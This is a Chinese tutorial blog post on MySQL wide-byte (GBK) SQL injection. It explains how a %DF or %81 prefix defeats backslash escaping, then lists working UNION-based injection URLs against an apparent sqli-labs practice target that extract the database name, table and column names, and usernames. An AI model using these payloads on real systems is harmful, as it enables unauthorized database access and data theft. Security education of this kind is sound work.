文档备案控制台

开发者社区数据库文章正文

MySQL注入 -- 宽字节注入

2024-02-23 208

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

本文涉及的产品

RDS DuckDB + QuickBI 企业套餐，8核32GB + QuickBI 专业版

RDS MySQL DuckDB 分析主实例，集群系列 4核8GB

RDS AI 助手，专业版

简介： MySQL注入 -- 宽字节注入

一、宽字节注入介绍

1、在注入点输入（'）会被转义为（\'）编码后为（%5c%27），只有把斜杆去掉才能注入

2、GBK编码表，%DF%5C正好组成（運），所以会把\"吃掉"，0X81-0XFE都可以

二、实例演示

1、获取数据库名称

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,database() --+

2、获取数据库security的表

http://192.168.139.129/sqli/Less-32/?id=1%df' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 --+

3、获取下一个表

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1 --+

4、获取表名为users的字段名

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,column_name from information_schema.columns where table_name=0x7573657273 --+
http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,column_name from information_schema.columns where table_name=0x7573657273 limit 11,1--+

5、获取字段内容

http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,username from users --+
http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,username from users limit 1,1 --+

禁止非法，后果自负

文章标签：

云数据库 RDS MySQL 版

关系型数据库

MySQL

数据库

安全

关键词：

云数据库 RDS MySQL 版注入

云数据库 RDS MySQL 版字节

云数据库 RDS MySQL 版注入字节

相关实践学习

每个IT人都想学的“Web应用上云经典架构”实战

本实验从Web应用上云这个最基本的、最普遍的需求出发，帮助IT从业者们通过“阿里云Web应用上云解决方案”，了解一个企业级Web应用上云的常见架构，了解如何构建一个高可用、可扩展的企业级应用架构。

MySQL数据库入门学习

本课程通过最流行的开源数据库MySQL带你了解数据库的世界。   相关的阿里云产品：云数据库RDS MySQL 版阿里云关系型数据库RDS（Relational Database Service）是一种稳定可靠、可弹性伸缩的在线数据库服务，提供容灾、备份、恢复、迁移等方面的全套解决方案，彻底解决数据库运维的烦恼。了解产品详情: https://www.aliyun.com/product/rds/mysql 

sumith

目录

相关文章

技术自由圈/原疯狂创客圈

|

9月前

|

关系型数据库 MySQL Java

字节面试： MySQL 百万级导入发生的 “死锁” 难题如何解决？“2序4拆”，彻底攻克

字节面试： MySQL 百万级导入发生的 “死锁” 难题如何解决？“2序4拆”，彻底攻克

技术自由圈/原疯狂创客圈

677 0 1

字节面试： MySQL 百万级导入发生的 “死锁” 难题如何解决？“2序4拆”，彻底攻克

蓝易云

|

SQL 安全关系型数据库

mysql注入-字符编码技巧

通过字符编码技巧，攻击者可以在SQL注入中绕过常见的输入验证机制，成功攻击数据库。因此，理解这些技巧及其可能的攻击路径，对防御SQL注入至关重要。开发者应采取多层次的安全措施，确保应用程序在不同字符集和编码环境下都能有效防御注入攻击。通过强制使用统一编码、严格的输入验证、预编译语句以及多层次的编码检查，可以有效地提高系统的安全性，防止SQL注入攻击带来的风险。

蓝易云

446 72 72

磊哥聊Java

|

SQL 关系型数据库 MySQL

字节面试：MySQL自增ID用完会怎样？

字节面试：MySQL自增ID用完会怎样？

磊哥聊Java

227 0 0

字节面试：MySQL自增ID用完会怎样？

sumith

|

关系型数据库 MySQL

Mysql注入 -- 注入类型

Mysql注入 -- 注入类型

sumith

133 1 1

老板这功能得加钱

|

消息中间件关系型数据库 MySQL

MySQL 到 Kafka 实时数据同步实操分享(1)，字节面试官职级

MySQL 到 Kafka 实时数据同步实操分享(1)，字节面试官职级

老板这功能得加钱

471 0 0

sumith

|

安全关系型数据库 MySQL

Mysql注入 -- 数据库导出及读文件

Mysql注入 -- 数据库导出及读文件

sumith

239 0 0

sumith

|

安全关系型数据库 MySQL

Mysql注入 -- 联合注入

Mysql注入 -- 联合注入

sumith

151 0 0

sumith

|

关系型数据库 MySQL 数据库

Mysql注入 -- 布尔注入

Mysql注入 -- 布尔注入

sumith

153 0 0

sumith

|

安全关系型数据库 MySQL

Mysql注入 -- 延时注入

Mysql注入 -- 延时注入

sumith

508 0 0

sumith

|

安全关系型数据库 MySQL

Mysql注入 -- 报错注入

Mysql注入 -- 报错注入

sumith

231 0 0

热门文章

最新文章

阿里云DTS踩坑经验分享系列｜如何使用DTS进行MySQL->ClickHouse同步

使用Datax将MySQL中的数据导入到TableStore中

阿里云服务器ecs配置之安装mysql

【RDS SQL Server】RDS使用SSRS（SQL Server Reporting Services）报表服务

MySQL5.6 新特性（全局事务标示符(GTID)）

mysql存储过程和游标以及if-else,while典型实例

揭秘MySQL生态重要功能，X-Engine引擎核心能力——OnlineDDL

Command execution with a MySQL UDF

将 MySQL 数据抽取并写入 DataHub，您可以按照以下步骤进行

mysql dba系统学习（5）二进制日志之一

Java语言与MySQL数据库连接的技术性探讨

项目从 MySQL 切换 PostgreSQL，踩了太多的坑！！！

mysql 故障排除与优化

mysql 主从复制与读写分离

mysql 高阶语句与视图

mysql日志管理、备份与恢复

mysql 存储引擎基本介绍

mysql 事务基本介绍

mysql 索引基本介绍

mysql 数据库增删改查基本操作

相关课程

更多

MySQL企业常见架构与调优经验分享

阿里云云原生数据仓库AnalyticDB MySQL版使用教程

MySQL实战进阶

阿里云数据库产品家族及特性

数据库及SQL/MySQL基础

云数据库MySQL快速入门

相关电子书

更多

PolarDB MySQL引擎重磅功能及产品能力盛大发布

阿里云MySQL云数据库产品体系介绍

One Box：解读事务与分析一体化数据库 HybridDB for MySQL

相关实验场景

更多

如何快速连接云数据库RDS MySQL

MySQL数据库快速部署实践

推荐镜像

更多

mysql

下一篇

PolarDB MySQL 版 Serverless-测评